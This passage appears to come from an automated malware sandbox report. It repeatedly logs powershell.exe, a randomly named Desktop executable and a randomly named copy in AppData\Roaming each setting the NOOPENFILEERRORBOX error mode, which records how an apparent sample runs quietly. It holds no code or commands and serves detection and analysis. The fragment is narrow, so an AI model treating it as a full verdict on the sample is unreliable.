                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
